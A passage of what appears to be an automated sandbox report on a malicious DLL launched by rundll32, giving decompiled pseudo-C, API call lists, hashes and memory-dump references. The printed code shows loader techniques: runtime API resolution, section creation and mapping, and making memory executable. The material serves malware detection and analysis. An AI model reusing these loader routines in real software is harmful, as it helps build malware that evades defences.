						_t33 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d6450f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d645104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d645119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d64512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D6418D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d641ab3
0x6d641ab7
0x6d641b78
0x6d641abd
0x6d641ad5
0x6d641ae4
0x6d641aeb
0x6d641aef
0x6d641af2
0x6d641b70
0x6d641b71
0x6d641af4
0x6d641b01
0x6d641b05
0x6d641b08
0x00000000
0x6d641b0a
0x6d641b17
0x6d641b1b
0x6d641b1e
0x00000000
0x6d641b20
0x6d641b2d
0x6d641b31
0x6d641b34
0x00000000
0x6d641b36
0x6d641b43
0x6d641b47
0x6d641b4a
0x00000000
0x6d641b4c
0x6d641b52
0x6d641b58
0x6d641b5d
0x6d641b64
0x6d641b67
0x00000000
0x6d641b69
0x6d641b6c
0x6d641b6c
0x6d641b67
0x6d641b4a
0x6d641b34
0x6d641b1e
0x6d641b08
0x6d641af2
0x6d641b86

APIs

Part of subcall function 6D641C8F: HeapAlloc.KERNEL32(00000000,?,6D64117D,?,00000000,00000000,?,?,?,6D641810), ref: 6D641C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D641272,?,?,?,?,00000002,00000000,?,?), ref: 6D641AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6D641AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B01
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B17
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B43

Part of subcall function 6D6418D1: memset.NTDLL ref: 6D641950

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 029fcc5ea9b33506a56833b8635e9382f610fcb6c38e487c60cdbe5236225e0c
Instruction ID: d0473008dc80bd5d9e4300d8d8a1e7cb0c2a7f51dd43e7624786920ad9b4f046
Opcode Fuzzy Hash: 029fcc5ea9b33506a56833b8635e9382f610fcb6c38e487c60cdbe5236225e0c
Instruction Fuzzy Hash: BB21EDF150060A9FDB50EF69D880E6A7BFCFB0D684B01C526E919C7211EB74E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D673A3E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D673F76

Part of subcall function 6D673BA0: __FF_MSGBANNER.LIBCMT ref: 6D673BC3
Part of subcall function 6D673BA0: __NMSG_WRITE.LIBCMT ref: 6D673BCA

std::bad_alloc::bad_alloc.LIBCMT ref: 6D673F99

Part of subcall function 6D673EF2: std::exception::exception.LIBCMT ref: 6D673EFE

std::bad_exception::bad_exception.LIBCMT ref: 6D673FAD
__CxxThrowException@8.LIBCMT ref: 6D673FBB

Strings

t?ym, xrefs: 6D673F89

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID: t?ym
API String ID: 1802512180-667981088
Opcode ID: 13fcc2740523a2fc6716f985400c2993fa9a7d5217f90b59d172204676596cc9
Instruction ID: e79e711649e9d1aed3d3a324a4da685f8bb3ff160d7e7c68a82ae72aaac359c3
Opcode Fuzzy Hash: 13fcc2740523a2fc6716f985400c2993fa9a7d5217f90b59d172204676596cc9
Instruction Fuzzy Hash: 22F09E3240C20F32CF289634EC04E7D77799B4E3ACF518025F93D56084DF65DE01819A

Uniqueness

Uniqueness Score: -1.00%

Function 6D6833EA, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentTypes.LIBCMT ref: 6D683425
operator+.LIBCMT ref: 6D683434
DName::DName.LIBCMT ref: 6D683451
DName::operator+.LIBCMT ref: 6D683458
DName::operator+.LIBCMT ref: 6D68345F

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: Name::operator+$ArgumentDecorator::getNameName::Typesoperator+
String ID:
API String ID: 4203687869-0
Opcode ID: c60fe6047f4041913148cc39ad57cb07065a35704fbae00e47229a46f210437d
Instruction ID: ebde616b94e547ab92a1058d9b6e2570fb36af6161c8de73b39890ada83a02b4
Opcode Fuzzy Hash: c60fe6047f4041913148cc39ad57cb07065a35704fbae00e47229a46f210437d
Instruction Fuzzy Hash: 12018F31A04109ABCF01DBB8C851EED7BB5EB4D30CF018455FA15EB292DB71D5458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6D678BF9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6D678B50

Part of subcall function 6D67432E: __mtinitlocknum.LIBCMT ref: 6D674344
Part of subcall function 6D67432E: __amsg_exit.LIBCMT ref: 6D674350

__lock.LIBCMT ref: 6D678B90
___removelocaleref.LIBCMT ref: 6D678B9F
___freetlocinfo.LIBCMT ref: 6D678BB8

Part of subcall function 6D673A49: __lock.LIBCMT ref: 6D673A67
Part of subcall function 6D673A49: ___sbh_find_block.LIBCMT ref: 6D673A72
Part of subcall function 6D673A49: ___sbh_free_block.LIBCMT ref: 6D673A81

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __lock$___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
String ID:
API String ID: 2822171422-0
Opcode ID: a6b672a0944707210210970be132e8b6086288867e734516a517d9cb8125d38d
Instruction ID: ed80d5269713f449f698fd1bed94ae6245ee7eaa67dc249459ff2850a9105139
Opcode Fuzzy Hash: a6b672a0944707210210970be132e8b6086288867e734516a517d9cb8125d38d
Instruction Fuzzy Hash: 1411E0B050930DEADB309FB99444B2E77A4AF0CB64F214559E1689B1F0DB74DC80C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 6D678A04, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6D678A10

Part of subcall function 6D675F1B: __getptd_noexit.LIBCMT ref: 6D675F1E
Part of subcall function 6D675F1B: __amsg_exit.LIBCMT ref: 6D675F2B

__getptd.LIBCMT ref: 6D678A27
__amsg_exit.LIBCMT ref: 6D678A35
__lock.LIBCMT ref: 6D678A45

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 0a42aab82b37ccd3a3f3ce90c25fb9079bb5ed213974ca18822b879e1da12dd2
Instruction ID: 97413f951a4a33cccddbf83f0ba6d96c81067c665aef7e7c193f18127f9b9180
Opcode Fuzzy Hash: 0a42aab82b37ccd3a3f3ce90c25fb9079bb5ed213974ca18822b879e1da12dd2
Instruction Fuzzy Hash: E9F09031D0870EDBD730DB798001B6D73A0AF0C769F424689D65DA76E1DF749D01CA6A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1004 Parent PID: 5608 rundll32.exeCOMMON

Executed Functions

Function 6D68D1A5, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000706,00003000,00000040,00000706,6D68CC00), ref: 6D68D262
VirtualAlloc.KERNEL32(00000000,0000002B,00003000,00000040,6D68CC5E), ref: 6D68D299
VirtualAlloc.KERNEL32(00000000,0000F0E3,00003000,00000040), ref: 6D68D2F9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D68D32F
VirtualProtect.KERNEL32(6D640000,00000000,00000004,6D68D184), ref: 6D68D434
VirtualProtect.KERNEL32(6D640000,00001000,00000004,6D68D184), ref: 6D68D45B
VirtualProtect.KERNEL32(00000000,?,00000002,6D68D184), ref: 6D68D528
VirtualProtect.KERNEL32(00000000,?,00000002,6D68D184,?), ref: 6D68D57E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D68D59A

Memory Dump Source

Source File: 00000004.00000002.518268223.000000006D68C000.00000040.00020000.sdmp, Offset: 6D68C000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 25765cf8fc345e293d894565df2a5847854e54997380a13ec6d8e60e9d1bf4c5
Instruction ID: 21d4a082d8645f396888fda5012fee34e6a872d62aa82eab90f7e89252e3408a
Opcode Fuzzy Hash: 25765cf8fc345e293d894565df2a5847854e54997380a13ec6d8e60e9d1bf4c5
Instruction Fuzzy Hash: 6BD157765006019FEB11CF14C890BA277A6FFC8310B2945AAEE1E9F65BD770A811EF74

Uniqueness

Uniqueness Score: -1.00%

Function 6D6418D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D6418D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6D641B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6d6418da
0x6d6418e1
0x6d6418e2
0x6d6418e3
0x6d6418e4
0x6d6418e5
0x6d6418f6
0x6d6418fa
0x6d64190e
0x6d641911
0x6d641914
0x6d64191b
0x6d64191e
0x6d641925
0x6d641928
0x6d64192b
0x6d64192e
0x6d641933
0x6d64196e
0x6d641935
0x6d641938
0x6d64193e
0x6d641943
0x6d641947
0x6d641965
0x6d641949
0x6d641950
0x6d64195e
0x6d64195e
0x6d641947
0x6d641976

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 6D64192E

Part of subcall function 6D641B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D641943,00000002,00000000,?,?,00000000,?,?,6D641943,00000000), ref: 6D641BB6

memset.NTDLL ref: 6D641950

Strings

@, xrefs: 6D64191E

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: 8286fb0d385bcc02d4a0c9ec80137ce89785610dd42a0a66e223aaa6a5e47afe
Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: 822108B2D0020DAFDB01DFA9C8849DEFBB9FF48354F10842AE615F3210D734AA548BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D641B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D641B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6d641b9b
0x6d641ba1
0x6d641baf
0x6d641bb6
0x6d641bbb
0x6d641bc1
0x00000000
0x6d641bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D641943,00000002,00000000,?,?,00000000,?,?,6D641943,00000000), ref: 6D641BB6

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: bc5ff899abb06a87e2a1e3ab7d961de22b5543006d99a7c7f49db951708accd9
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: C3F012B590020CFFEB119FA5CC85C9FBBFDEB48394B108939F652E1190E6309E189B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D6417A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6D6417A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D64146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6D6415A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D641C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D641CA4(E6D6416EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D641D7C(_t45,  &_v48) != 0) {
					 *0x6d6441b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6d6441b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D641C8F(_t50 + _t15);
				 *0x6d6441b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6D64136A(_t44);
					goto L11;
				}
			}

0x6d6417b3
0x6d6417bc
0x6d6417c0
0x6d6418c8
0x6d6418ce
0x00000000
0x00000000
0x00000000
0x6d6417c6
0x6d6417c6
0x6d6417cb
0x6d6417d1
0x6d6417e0
0x6d6417e1
0x6d6417e4
0x6d6417e7
0x6d6417f0
0x6d6417f4
0x6d6417fa
0x6d6417fe
0x6d641805
0x00000000
0x00000000
0x6d64180b
0x6d641812
0x6d641816
0x6d6418b9
0x6d6418b9
0x6d6418c0
0x6d6418c2
0x6d6418c2
0x00000000
0x6d6418c0
0x6d64181f
0x6d641872
0x6d641872
0x6d641883
0x6d641887
0x6d6418b5
0x6d641889
0x6d64188c
0x6d641894
0x6d641898
0x6d6418a0
0x6d6418a0
0x6d6418a7
0x6d6418a7
0x00000000
0x6d641887
0x6d64182d
0x6d64186c
0x00000000
0x6d64186c
0x6d64182f
0x6d641833
0x6d64183c
0x6d64183e
0x6d641842
0x6d641864
0x6d641864
0x00000000
0x6d641864
0x6d641844
0x6d641849
0x6d641850
0x6d641855
0x00000000
0x6d641857
0x6d64185a
0x6d64185d
0x00000000
0x6d64185d

APIs

Part of subcall function 6D64146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D6417B8,76D263F0,00000000), ref: 6D64147B
Part of subcall function 6D64146C: GetVersion.KERNEL32 ref: 6D64148A
Part of subcall function 6D64146C: GetCurrentProcessId.KERNEL32 ref: 6D641499
Part of subcall function 6D64146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D6414B2

GetSystemTime.KERNEL32(?,76D263F0,00000000), ref: 6D6417CB
SwitchToThread.KERNEL32 ref: 6D6417D1

Part of subcall function 6D6415A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D6415F9
Part of subcall function 6D6415A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D6417EC), ref: 6D64168B
Part of subcall function 6D6415A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D6416A6

Sleep.KERNELBASE(00000000,00000000), ref: 6D6417F4
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6D64183C
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6D64185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6D6416EC,?,00000000), ref: 6D64188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D6418A0
CloseHandle.KERNEL32(00000000), ref: 6D6418A7
GetLastError.KERNEL32(6D6416EC,?,00000000), ref: 6D6418AF
GetLastError.KERNEL32 ref: 6D6418C2

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: c8bd3911f0359a613a52c110b737961a01ad385acc3c3e8c83169b3a3962e1e0
Instruction ID: ffee2dc5322490a884c87b5f6baf307be8a3318b26bd4337db716aef33823183
Opcode Fuzzy Hash: c8bd3911f0359a613a52c110b737961a01ad385acc3c3e8c83169b3a3962e1e0
Instruction Fuzzy Hash: 4A31D2718487169FD750EF668C44A6B7BFCEB8E754F00CA2AF524C2140E738C5508BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D641979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6D641979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D642210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d6441d0;
				_push(_t15 + 0x6d64505e);
				_push(_t15 + 0x6d645054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D64220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6d6441c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d641979
0x6d641982
0x6d641986
0x6d64198c
0x6d641991
0x6d641996
0x6d641999
0x6d64199c
0x6d6419a1
0x6d6419a2
0x6d6419a5
0x6d6419b0
0x6d6419b7
0x6d6419bb
0x6d6419bd
0x6d6419be
0x6d6419c1
0x6d6419c6
0x6d6419d0
0x6d6419d2
0x6d6419d2
0x6d6419e6
0x6d6419ec
0x6d6419f0
0x6d641a40
0x6d6419f2
0x6d6419fb
0x6d641a11
0x6d641a19
0x6d641a2b
0x6d641a2f
0x00000000
0x00000000
0x6d641a1b
0x6d641a1e
0x6d641a23
0x6d641a25
0x6d641a25
0x6d641a06
0x6d641a08
0x6d641a31
0x6d641a32
0x6d641a32
0x6d6419fb
0x6d641a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?,?), ref: 6D641986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D64199C
_snwprintf.NTDLL ref: 6D6419C1
CreateFileMappingW.KERNELBASE(000000FF,6D6441C0,00000004,00000000,?,?), ref: 6D6419E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D6419FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6D641A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D641A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A), ref: 6D641A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D641A3A

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 487f452f5fcc952b15d5e55eb9ad79a609f20aefdaae8a481ebd3405e8f3e324
Instruction ID: d5b5e224240f75ef8bd03eb3050d69f804ce268de3c835a861481d7e3a042ae2
Opcode Fuzzy Hash: 487f452f5fcc952b15d5e55eb9ad79a609f20aefdaae8a481ebd3405e8f3e324
Instruction Fuzzy Hash: 3A21CCB2640108BFDB11EFA9DC84FAE3BB8EB4E354F10C125F615D7180DB7498958B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D641AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D641C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d6441d0 + 0x6d645014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d6450e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D64136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d6450f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d645104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d645119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d64512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D6418D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6D641C8F: HeapAlloc.KERNEL32(00000000,?,6D64117D,?,00000000,00000000,?,?,?,6D641810), ref: 6D641C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6D641272,?,?,?,?,00000002,00000000,?,?), ref: 6D641AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6D641AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B01
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B17
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6D641B43

Part of subcall function 6D6418D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 6D64192E
Part of subcall function 6D6418D1: memset.NTDLL ref: 6D641950

Memory Dump Source

Source File: 00000004.00000002.517822925.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000004.00000002.517773001.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517858345.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.517895787.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.517932175.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 029fcc5ea9b33506a56833b8635e9382f610fcb6c38e487c60cdbe5236225e0c
Instruction ID: d0473008dc80bd5d9e4300d8d8a1e7cb0c2a7f51dd43e7624786920ad9b4f046
Opcode Fuzzy Hash: 029fcc5ea9b33506a56833b8635e9382f610fcb6c38e487c60cdbe5236225e0c
Instruction Fuzzy Hash: BB21EDF150060A9FDB50EF69D880E6A7BFCFB0D684B01C526E919C7211EB74E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D641E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d644188);
					__eflags = _t10;
